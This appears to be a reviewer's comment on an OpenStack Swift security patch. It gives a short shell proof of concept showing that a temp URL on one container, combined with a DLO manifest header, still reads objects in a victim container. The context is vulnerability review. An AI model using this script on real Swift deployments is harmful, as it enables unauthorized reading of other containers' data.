Looks like the patch still allows abuse of DLO+container tempurl, for example using the following simple script:
echo 12345 > foo.txt
swift upload victim-container foo.txt
swift post -m "temp-url-key: secret" compromised-container
tempurl=`swift-temp-url PUT 60 /v1/AUTH_test/compromised-container/foo.txt secret`
curl -i -X PUT http://127.0.0.1:8080${tempurl} -H 'X-Object-Manifest: victim-container/f' -H 'Content-Length: 0'
tempurl=`swift-temp-url GET 60 /v1/AUTH_test/compromised-container/foo.txt secret`
curl -i http://127.0.0.1:8080${tempurl}
Or did I get it wrong?